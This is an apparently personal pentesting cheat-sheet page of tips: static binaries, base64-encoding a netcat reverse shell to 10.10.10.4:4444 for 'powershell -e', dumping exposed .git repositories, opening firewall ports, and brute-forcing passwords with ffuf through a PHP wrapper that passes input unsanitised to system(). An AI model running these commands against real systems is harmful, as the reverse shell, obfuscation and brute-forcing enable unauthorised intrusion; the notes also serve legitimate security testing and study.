Skip to content

Tips

Static binaries

Tools like socat, nmap, ... are rarely installed on machines, however you can upload a static binary and use it.

List : ag/the_silver_searcher, binutils, file, ht, nano, nmap, p0fv3, pv(PipeViewer), python, socat, strace, tcpdump, yasm.

Link : github.com/andrew-d/static-binaries

Windows UTF16 Little Endian

$ echo -n 'c:\windows\temp\nc.exe 10.10.10.4 4444 -e powershell' | iconv -t utf-16le | base64 -w 0
YwA6AFwAdwBpAG4AZAB...

C:> powershell -e YwA6AFwAdwBpAG4AZAB...

$command = 'c:\windows\temp\nc.exe 10.10.10.4 4444 -e powershell'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
$encodedCommand

Thanks @xThaz

Extract files from .git

Using git :

$ ls -al web
total 12
drwxr-xr-x  3 xanhacks xanhacks 4096 Feb  7 14:47 .
drwxr-xr-x 12 xanhacks xanhacks 4096 Feb  7 14:47 ..
drwxr-xr-x  6 xanhacks xanhacks 4096 Feb  7 14:45 .git
$ git --work-tree=$(pwd) checkout HEAD^1 # checkout to a random commit
HEAD is now at 82dfc97 Initial Commit for the back-end
$ git --work-tree=$(pwd) checkout master # come back to the last commit
Previous HEAD position was 82dfc97 Initial Commit for the back-end
Switched to branch 'master
$ ls
css  favicon.png  fonts  img  index.html  js  resources

Using GitTools :

$ ls -al web
total 12
drwxr-xr-x  3 xanhacks xanhacks 4096 Feb  7 14:47 .
drwxr-xr-x 12 xanhacks xanhacks 4096 Feb  7 14:47 ..
drwxr-xr-x  6 xanhacks xanhacks 4096 Feb  7 14:45 .git
$ git clone https://github.com/internetwache/GitTools
[...]
$ bash GitTools/Extractor/extractor.sh web/ output/
[...]
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: 70dde80cc19ec76704567996738894828f4ee895
[...]
$ ls output
0-70dde80cc19ec76704567996738894828f4ee895
1-345ac8b236064b431fa43f53d91c98c4834ef8f3
2-82dfc97bec0d7582d485d9031c09abcb5c6b18f2
$ ls output/0-70dde80cc19ec76704567996738894828f4ee895
commit-meta.txt  css  favicon.png  fonts  img  index.html  js

Add firewall rule

RedHat / CentOS

$ firewall-cmd --zone=public --add-port PORT/tcp
$ firewall-cmd --zone=public --add-port 4444/tcp

Windows

C:\> netsh advfirewall firewall add rule name="portfwd" dir=in action=allow protocol=tcp localport=20000
Ok.

Bruteforce whatever you want

$ cat index.php
<?php

$pass = $_REQUEST['pass'];
system("memccat --username toto --password $pass --servers 10.10.10.190");

?>
$ php -S localhost:8000
[Thu Feb 10 18:29:12 2022] PHP 8.1.2 Development Server (http://localhost:8000) started

$ ffuf -u 'http://localhost:8000?pass=FUZZ' -w /opt/rockyou.txt -fs 40